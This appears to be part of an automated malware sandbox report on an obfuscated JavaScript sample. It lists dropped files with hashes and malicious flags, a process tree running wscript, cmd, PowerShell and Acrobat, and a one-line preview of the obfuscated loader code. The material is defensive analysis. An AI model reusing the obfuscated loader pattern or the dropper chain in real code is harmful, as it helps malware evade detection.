Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.273039875391173 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJfbPtdPeUkwRe9:YvXKX7biSDXSYpW7aGDV8Ukee9 |
MD5: | 1EB5B8A638623108839B5B323F73782D |
SHA1: | 26EF8C08C9ECFC7DF1D8A2A237185486224CADCA |
SHA-256: | 6BBE0B6D3D7F1AE9A15E83553804B0200ADF09BF5C5CF5EE855F82BAEEA7C1FE |
SHA-512: | 3E4045F1F50DB6DF1CB14B8B4310296706DDDB1721DB23BE819EE8A77CA7E5127BA32784E95DD1306653F54DF927FE8FDCC09176613E083190F3540FB24CDB4A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.274252271941029 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJf21rPeUkwRe9:YvXKX7biSDXSYpW7aG+16Ukee9 |
MD5: | 12FB94FA4CDBEB7CC0EDA09AA2284617 |
SHA1: | DB6AD8FA7D7852C1DF8C3CCF90886018C994D211 |
SHA-256: | 1D6E08EC427CD09D06DF0356369005D1729308256D0401BB0C2DB1C2335CCF6E |
SHA-512: | 96BC0CD7ED0B8DCCC96D3B2F7927EB5EF754A15B9F4EF540B831B8DCE3ED14E70EBB83FF35DAD9E742953FBF852DE76387A75C3850A5E7BCDBCD57B0D4B1B045 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.663435508740377 |
Encrypted: | false |
SSDEEP: | 24:Yv6X7eSDX3iPamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSK4:YvmefnBgkDMUJUAh8cvM5 |
MD5: | 8DF172C74E8668ADE69458D3FF03A191 |
SHA1: | 3F75234055DA5F262873F9FD7CC4867BA700236E |
SHA-256: | F8EF4EB2B9E72BE59EF7C67232A2234B97C66C69AFA33E6C6F7871D8EE03D884 |
SHA-512: | F6F900044364873E5F8A1A642BCE239B3B6CC686B259EBE2D5D44F50381ADDD447FE99AF1AEDCEA863C0A674B5F8A092E93C6BB4FE2E9EE5DA656A016113E0A9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.251138007817236 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJfshHHrPeUkwRe9:YvXKX7biSDXSYpW7aGUUUkee9 |
MD5: | A065AF300490503FEB07817C406FCD30 |
SHA1: | F5151F830A9C8A904BEA28796B6BFE01C1FFD9B5 |
SHA-256: | AAEB354E35D0FC8DC768DE33E196F563ECF00D4576963CAAA38B6BC8DC7CBC15 |
SHA-512: | C942599CACBBAAD45A7A6A9D25F2A5601B587C79FFFFEDBE6C142E96BC44F1A3D584218FBAEB10AF8B3D3816C7B4D0A6E36A1E42A30BC4275B7E9B9228FFAA9C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.25666748127588 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXPTbiSS1bQAUXb+FIbRI6XVW7+0YzUoAvJTqgFCrPeUkwRe9:YvXKX7biSDXSYpW7aGTq16Ukee9 |
MD5: | FF4B89CFD28352103585EE63D3A36478 |
SHA1: | CF492A17A057BF9FA52DEC9CA86ED953B885A498 |
SHA-256: | 328B56A778330947F24E509F995A9559F7E589DAD1E87F77C60C9843FFF087FA |
SHA-512: | 0DA9AC381A4827D36A3547B643B536EF7523AA5B4758D9D91738E4A2C861AF3DB02FD6DEDC176C8E772C79007F3BAEC198C375112948368A84CF691B7004B11B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.124238088467896 |
Encrypted: | false |
SSDEEP: | 24:Y1Hy9HzLa5A3ayfVsvj47WADYA5Sz8eCuRjzj0Srz32O2LSVC14jadx959629kuL:Y1S9HvSaWADjm8Do/bHny4mdj3629Z |
MD5: | 0A48E0AAC0B2E8A97D4C5FDC00BC14B4 |
SHA1: | 8D7BB6FC4D7A1BB46C3086934D19B1D066D6BFA9 |
SHA-256: | F8DF3FA17B184FECA1C93A263A148B1BCA975F9718D16825A86BB5832542D4E9 |
SHA-512: | D2B757E7BA8CBA609CCAE96EEC79B10530B181AF96F86D523696B6B4B75F2358F74AF25A2F74C313944BCE706BAA25052C0E9295018F32329DD9A774B053D98E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.0008473808708738 |
Encrypted: | false |
SSDEEP: | 24:TLKufx/XYKQvGJF7ursB1RZKHs/DXblpQuVD3R8RNzF:TGufl2GL7msvgOXbzQuNYZ |
MD5: | 077C4341D7F982B0BBB888B41787CFE9 |
SHA1: | 673EF2511EC1838367D8E6D6DDC23B56BF8C0D9A |
SHA-256: | 99F79F1D68B1C463E569D4964B184AA9EAFDBBC17CE5B60ADCEFF933A58087E2 |
SHA-512: | F310BD905DC514B1381E2C04650B69D905AA1F520E97F132A3C821ABC35BDAAC6E71E3B373A5B7C7C5AD252FAC56880DDD575381C9B4E3ABC47E75B50F524993 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.3647587925145777 |
Encrypted: | false |
SSDEEP: | 24:7+te1RZKHs/Ds/SpZpQuVD3R8RNzvWqLhx/XYKQvGJF7urscn:7MugOVpXQuNYDWqFl2GL7msW |
MD5: | 510C50D95FA63DFF5DB1962D01D98473 |
SHA1: | 9EC9BCC9EDC858D9720E1E0D9690787F9844B00E |
SHA-256: | 5EFA28D220EE4AF2F84F1F9E4F8CE80928158802911804BC8AC0D47DBF80A18C |
SHA-512: | 0D30C2DC5661569D9C0A6E5FDA7DB8AB3CCC82B8A92FB28310CAF48B2D3D256B715A2D133DA0150EC89EE400F36D1CB0569ED43A77AB276B78E158B6C26A7BB8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgq0T8RX958eFKlwaJIhaYeDP/Yyu:6a6TZ44ADEq0kX958LzL/K |
MD5: | A293940A6CEB29721A0A0C5729EB26FF |
SHA1: | 02D6DCCA803B15E06E58178B6CFFEDA4A1B21515 |
SHA-256: | 5C63C5E8C7232D320C7A0190172D575B8A8F0607F648E4A78204695EF3381529 |
SHA-512: | 0868001101C130A41B8BA25315D34658FAEE25ACDC1625EF8AA64524A1EBA6E99EABA656F445DF420DD8DDF0AC4BB165BC81763C9F1D7243CBC7850CD764FA40 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul/nq/llh:NllUyt |
MD5: | AB80AD9A08E5B16132325DF5584B2CBE |
SHA1: | F7411B7A5826EE6B139EBF40A7BEE999320EF923 |
SHA-256: | 5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4 |
SHA-512: | 9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4857408731223103 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClELolf9:Qw946cPbiOxDlbYnuRK+bDC |
MD5: | D6B43444A083E3E25F55AF7F0CB06B79 |
SHA1: | 1DB32C6C1071AD5EA9363CD1E207B907616E8217 |
SHA-256: | A95E3C1B09E1C7542B48B7D08AF8D5C934E5FC2335E8B25ABCF9834F297D8B36 |
SHA-512: | 878F0C962C89104A5D146189B70D83517C3A0C12AE4B457D8A5AF45C9B632E47280A46B30A1873D1AE883A6F824DD0DA54D137094642184353E7B921126D7B87 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 17-09-59-182.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.376360055978702 |
Encrypted: | false |
SSDEEP: | 384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn |
MD5: | 1336667A75083BF81E2632FABAA88B67 |
SHA1: | 46E40800B27D95DAED0DBB830E0D0BA85C031D40 |
SHA-256: | F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1 |
SHA-512: | D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.362026410802292 |
Encrypted: | false |
SSDEEP: | 384:izfZQ8lmBJOuPgXp5jdyzNpQAnM+4EIrvIftLISYEaDdLsWDtNAq8x8tY2Y5itV+:FyK |
MD5: | 43C6A98B89509E6011BC2402A48F8F1F |
SHA1: | 99B373DA1D7F0499B240E090A4147A0F0F18D9F0 |
SHA-256: | F3CBF895288A5B2D997AEF4A5505AC9353E2012721BD1D9A26CE21387D8CDCB8 |
SHA-512: | FD442CB08864177C690B0049A00130B229156942B15B6F8E320E959D2DE3398B62BB4EF1A346AB20E455082606A8B86B960F336B2C09AEC569DC1739FC4F7F07 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.396510275484003 |
Encrypted: | false |
SSDEEP: | 768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbo:/k |
MD5: | B7E726C4793BE3846660E473C71FED20 |
SHA1: | B3D2CB814912C9B79B4AF8D875951E1B41C8E975 |
SHA-256: | E6762AAFEBB18698C3DC81B785DB696EDA84FDA70CC2B2FF6778715998D4496F |
SHA-512: | A6FDD87BDDE1581279F9FB067D843D1EC3F36AD2A39CBC5019E0BE3B353BF7F74C4FD483F33C55B64A88C03892D73706995633976E7AA7D9B3031AD10F87881E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje |
MD5: | 716C2C392DCD15C95BBD760EEBABFCD0 |
SHA1: | 4B4CE9C6AED6A7F809236B2DAFA9987CA886E603 |
SHA-256: | DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8 |
SHA-512: | E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/bwYIGNPgj9WL07oDGZPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:DwZGk9WLxDGZv3mlind9i4ufFXpAXkru |
MD5: | 36AF025F7630DDD5B9C7A6DEB2591572 |
SHA1: | BA981CA594B916799670FC1FA6DA3E5122AC8537 |
SHA-256: | BBA83C28E54F36DF0C19673D9BB24F171E702FAA1C8480F7EBA8B12C4ADF7B87 |
SHA-512: | 4E65D50E52D78876D8A76506E03FBEEFC82AD7DEA40DD1A3AA39F3A4119889A20D0FC28CC8E375ED8FA10A68053AC9B1BAEA49FABC2D13D124C6B087D6733B66 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 14456 |
Entropy (8bit): | 4.2098179599164975 |
Encrypted: | false |
SSDEEP: | 192:gcPqYV/saFlwwR+kMqe8TlZMX1sgUVa3ddMVsuNeMcGdSD9obOUAVlcMudM/Y14e:g7Q/X4kMb0lZ6mgtdHOelGdWaolvsTZ |
MD5: | 32FCA302C8B872738373D7CCB1E75FD4 |
SHA1: | DA85FAF24ED0ECFD5D69CCFD6286D8B77D7EB4F1 |
SHA-256: | CD0DD26304B88C20801FE80B33C49C009E2E5D4411B5D7F83252E1D90CD461C6 |
SHA-512: | 57F8CC85FAFB15455074431216E47433E50DF5DE74ED74C395B7FF2C433DB7CE06F0A1C1FE1EFDC17229DBC33325D559789F43901556DD1A12963B94F01D5A1F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.889297999805961 |
TrID: | |
File name: | 19597294421812213615.js |
File size: | 21'054 bytes |
MD5: | 6d2c26108a4dc62d46d9a320eeb943bc |
SHA1: | 9e9c791467a4d2a2b045f5aeb32fb5913e0bba94 |
SHA256: | b6ef27e36551e4a2eef7e2be667b60c0c91c221db03c3ede311d92308e461441 |
SHA512: | 71eddb7984f7eb2a4fa4ed34c41c257549ca3fd512c85f6eea7fb5e3905f6999c813c538da32ef0ec70b4ecc5aa830f7163ebacad9405a47fd49fdcedf523512 |
SSDEEP: | 192:2Tkcw/EHUNHrHCgpf1ancUhX9yMCAEhX0rnqdm3557pQA/l6ycUhcQHMQ9woFP1y:/cwKi5yrWhXk9+KcaFiUP1+U1jzNxy |
TLSH: | 819214C49E148A3304DC66E1ED2F0CF613EC089562F599D85C7A9CC939865A4FDF7272 |
File Content Preview: | function tcwum(){zazayzigs=[1031,3079,5127,4103,2055,3072];var jowuziq=this[bluorlqjp+lukbrwlan+yhsqm+vrcsmd+sbsryon+orcjd+bcfkjth+boodn](this[etefbq+gfplbai+tdkmtvnu+yhsqm+klujfxyj+bluorlqjp+boodn][xqnxssrjy+yhsqm+sbsryon+lukbrwlan+boodn+sbsryon+urbswsj+ |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 17:09:49 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6f9a60000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 17:09:50 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b82c0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 17:09:50 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 17:09:50 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7be880000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 17:09:55 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff686a00000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 17:09:55 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b82c0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 17:09:55 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff677bd0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 17:09:55 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6413e0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 17:09:56 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7e52b0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 17:09:57 |
Start date: | 10/01/2025 |
